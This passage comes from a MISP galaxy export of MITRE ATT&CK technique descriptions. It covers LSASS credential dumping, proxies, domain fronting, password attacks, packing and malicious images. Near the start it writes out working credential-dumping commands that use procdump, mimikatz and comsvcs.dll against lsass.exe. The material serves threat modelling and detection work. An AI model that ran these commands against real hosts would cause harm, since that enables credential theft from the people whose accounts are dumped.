<code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

<code>sekurlsa::Minidump lsassdump.dmp</code>
<code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

<code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"

Table 3670. Table References
Links
https://attack.mitre.org/techniques/T1003/001
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
https://github.com/mattifestation/PowerSploit

Protocol Impersonation - T1001.003

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003"

Table 3671. Table References
Links
https://attack.mitre.org/techniques/T1001/003
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Internal Proxy - T1090.001

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001"

Table 3672. Table References
Links
https://attack.mitre.org/techniques/T1090/001
http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

External Proxy - T1090.002

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002"

Table 3673. Table References
Links
https://attack.mitre.org/techniques/T1090/002
http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

LSA Secrets - T1003.004

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

The tag is: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"

Table 3674. Table References
Links
https://attack.mitre.org/techniques/T1003/004
https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
https://github.com/mattifestation/PowerSploit

Proc Filesystem - T1003.007

Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.

This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007"

Table 3675. Table References
Links
https://attack.mitre.org/techniques/T1003/007
https://github.com/huntergregal/mimipenguin

File Deletion - T1070.004

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"

Table 3676. Table References
Links
https://attack.mitre.org/techniques/T1070/004
http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

Domain Fronting - T1090.004

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004"

Table 3677. Table References
Links
https://attack.mitre.org/techniques/T1090/004
https://capec.mitre.org/data/definitions/481.html
http://www.icir.org/vern/papers/meek-PETS-2015.pdf

Password Guessing - T1110.001

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies. (Citation: Cylance Cleaver)

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

SSH (22/TCP)
Telnet (23/TCP)
FTP (21/TCP)
NetBIOS / SMB / Samba (139/TCP & 445/TCP)
LDAP (389/TCP)
Kerberos (88/TCP)
RDP / Terminal Services (3389/TCP)
HTTP/HTTP Management Services (80/TCP & 443/TCP)
MSSQL (1433/TCP)
Oracle (1521/TCP)
MySQL (3306/TCP)
VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"

Table 3678. Table References
Links
https://attack.mitre.org/techniques/T1110/001
https://capec.mitre.org/data/definitions/49.html
https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
https://www.us-cert.gov/ncas/alerts/TA18-086A

Password Cracking - T1110.002

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.

The tag is: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002"

Table 3679. Table References
Links
https://attack.mitre.org/techniques/T1110/002
https://capec.mitre.org/data/definitions/55.html
https://en.wikipedia.org/wiki/Password_cracking

Password Spraying - T1110.003

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

SSH (22/TCP)
Telnet (23/TCP)
FTP (21/TCP)
NetBIOS / SMB / Samba (139/TCP & 445/TCP)
LDAP (389/TCP)
Kerberos (88/TCP)
RDP / Terminal Services (3389/TCP)
HTTP/HTTP Management Services (80/TCP & 443/TCP)
MSSQL (1433/TCP)
Oracle (1521/TCP)
MySQL (3306/TCP)
VNC (5900/TCP)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003"

Table 3680. Table References
Links
https://attack.mitre.org/techniques/T1110/003
https://capec.mitre.org/data/definitions/565.html
http://www.blackhillsinfosec.com/?p=4645
https://www.us-cert.gov/ncas/alerts/TA18-086A
https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing

Credential Stuffing - T1110.004

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

SSH (22/TCP)
Telnet (23/TCP)
FTP (21/TCP)
NetBIOS / SMB / Samba (139/TCP & 445/TCP)
LDAP (389/TCP)
Kerberos (88/TCP)
RDP / Terminal Services (3389/TCP)
HTTP/HTTP Management Services (80/TCP & 443/TCP)
MSSQL (1433/TCP)
Oracle (1521/TCP)
MySQL (3306/TCP)
VNC (5900/TCP)

The tag is: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004"

Table 3681. Table References
Links
https://attack.mitre.org/techniques/T1110/004
https://capec.mitre.org/data/definitions/600.html
https://www.us-cert.gov/ncas/alerts/TA18-086A

Web Protocols - T1071.001

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001"

Table 3682. Table References
Links
https://attack.mitre.org/techniques/T1071/001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Bidirectional Communication - T1102.002

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002"

Table 3683. Table References
Links
https://attack.mitre.org/techniques/T1102/002
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Malicious Link - T1204.001

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"

Table 3684. Table References
Links
https://attack.mitre.org/techniques/T1204/001

Port Knocking - T1205.001

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001"

Table 3685. Table References
Links
https://attack.mitre.org/techniques/T1205/001
https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

Binary Padding - T1027.001

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"

Table 3686. Table References
Links
https://attack.mitre.org/techniques/T1027/001
https://capec.mitre.org/data/definitions/572.html
https://capec.mitre.org/data/definitions/655.html
https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/
https://www.virustotal.com/en/faq/

Mail Protocols - T1071.003

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003"

Table 3687. Table References
Links
https://attack.mitre.org/techniques/T1071/003
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Environmental Keying - T1480.001

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001"

Table 3688. Table References
Links
https://attack.mitre.org/techniques/T1480/001
https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js

Domain Properties - T1590.001

Adversaries may gather information about the victim’s network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001"

Table 3689. Table References
Links
https://attack.mitre.org/techniques/T1590/001
https://www.whois.net/
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/

Web Cookies - T1606.001

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001"

Table 3690. Table References
Links
https://attack.mitre.org/techniques/T1606/001
https://wunderwuzzi23.github.io/blog/passthecookie.html
https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Upload Malware - T1608.001

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001"

Table 3691. Table References
Links
https://attack.mitre.org/techniques/T1608/001
https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

Local Groups - T1069.001

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.

The tag is: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"

Table 3692. Table References
Links
https://attack.mitre.org/techniques/T1069/001

Default Accounts - T1078.001

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)

Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)

The tag is: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001"

Table 3693. Table References
Links
https://attack.mitre.org/techniques/T1078/001
https://capec.mitre.org/data/definitions/70.html
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh

Local Account - T1087.001

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"

Table 3694. Table References
Links
https://attack.mitre.org/techniques/T1087/001
https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Malicious File - T1204.002

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"

Table 3695. Table References
Links
https://attack.mitre.org/techniques/T1204/002

Software Packing - T1027.002

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002"

Table 3696. Table References
Links
https://attack.mitre.org/techniques/T1027/002
https://capec.mitre.org/data/definitions/570.html
https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
http://en.wikipedia.org/wiki/Executable_compression

Malicious Image - T1204.003

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003"

Table 3697. Table References
Links
https://attack.mitre.org/techniques/T1204/003
https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/
https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

Transport Agent - T1505.002

